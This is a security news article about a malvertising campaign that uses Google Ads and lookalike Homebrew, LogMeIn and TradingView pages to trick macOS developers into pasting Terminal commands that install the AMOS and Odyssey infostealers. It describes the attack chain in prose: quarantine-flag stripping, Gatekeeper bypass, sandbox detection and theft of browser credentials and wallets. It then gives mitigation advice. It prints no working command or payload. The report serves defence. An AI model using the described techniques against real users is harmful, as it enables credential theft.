A sophisticated malvertising campaign is targeting macOS developers by impersonating trusted services such as Homebrew, LogMeIn, and TradingView and convincing victims to run Terminal commands that install powerful infostealers like AMOS and Odyssey.
Researchers at Hunt.io uncovered more than 85 lookalike domains mimicking legitimate tooling and platforms. Attackers amplified traffic to those sites via Google Ads, increasing the chance that developers searching for downloads or help pages would land on malicious pages. The lures are polished: fake download portals, staged “security checks,” and instructions that ask users to copy-and-paste commands into Terminal — a technique commonly referred to as ClickFix.
Why this attack works
The core trick is social engineering coupled with technical subterfuge. Instead of delivering a neat installer, the counterfeit pages place a curl command or a base64-encoded payload into the clipboard. When a user pastes and executes the command, an install.sh script is fetched, decoded, and executed. That script drops a binary, strips macOS quarantine flags, and bypasses Gatekeeper prompts to allow execution.
Payload behavior and persistence
Once executed, the payload family varies — but known samples include AMOS (Atomic macOS Stealer) and the newer Odyssey Stealer. Both are designed to operate stealthily:
- they detect virtualized or sandbox analysis environments before fully activating;
- they call
sudoto run privileged commands, escalating their capabilities; - they harvest hardware and memory metadata to fingerprint the host;
- they manipulate legitimate macOS services (for example, disabling OneDrive updater daemons) to blend in;
- they scrape browser-stored credentials, cookies, and crypto-wallet extensions, then exfiltrate data in compressed archives to attacker-controlled command-and-control (C2) endpoints.
AMOS has been offered as a malware-as-a-service since 2023, while Odyssey appears to be an evolution of earlier stealers (Poseidon, etc.), focusing on browser credentials and Keychain data. Recent AMOS variants even include backdoor components to enable long-term remote access.
Why developers are prime targets
Developers and system administrators are attractive victims because they routinely copy and run commands from web pages when installing SDKs, CLIs, and package managers. The spoofing of Homebrew — the widely used macOS/Linux package manager — is especially dangerous: a convincing Homebrew-themed page already predisposes a developer to trust command-line installation steps.
Mitigation and defensive guidance
There are concrete, actionable steps organizations and individuals should implement immediately:
Never paste a command into Terminal that you cannot fully inspect. If a web page asks you to paste a command, copy it into a text editor first and verify its content. Look for obfuscated base64 payloads or remote fetches from unknown domains.
Prefer official repositories and signatures. Get installers from official project sites or GitHub repos, and verify PGP signatures or checksums where available.
Harden browser and endpoint policies. Enterprises should restrict downloads of risky file types (.exe, .msi, .bat, .dmg) via browser policy where possible and enforce strict script execution rules for managed endpoints.
Use enterprise controls for Chrome/Edge. On managed devices, disable automatic clipboard pastes for privileged actions and require admin review for scripts that request sudo.
Monitor for suspicious outbound traffic. Egress monitoring can catch data exfiltration to unusual domains or Telegram endpoints often used by these operators.
Educate developers. Regularly train dev teams on the hazards of copying commands and on recognizing fake domains and malvertising indicators.
Technical operators should also treat any unexpected Gatekeeper prompts or sudo requests as high-risk signals and isolate machines for forensic inspection if compromise is suspected.
Conclusion:
This campaign is a stark reminder that malicious actors blend user-level social engineering with low-cost infrastructure (malicious domains + paid ads) to reach technical audiences. macOS users — particularly developers who habitually paste installation commands — must adopt stricter command hygiene, platform hardening, and monitoring. Security teams should treat clipboard-based installers and ad-driven typosquats as high-risk vectors and respond with both technical controls and targeted user education to thwart infostealers like AMOS and Odyssey.
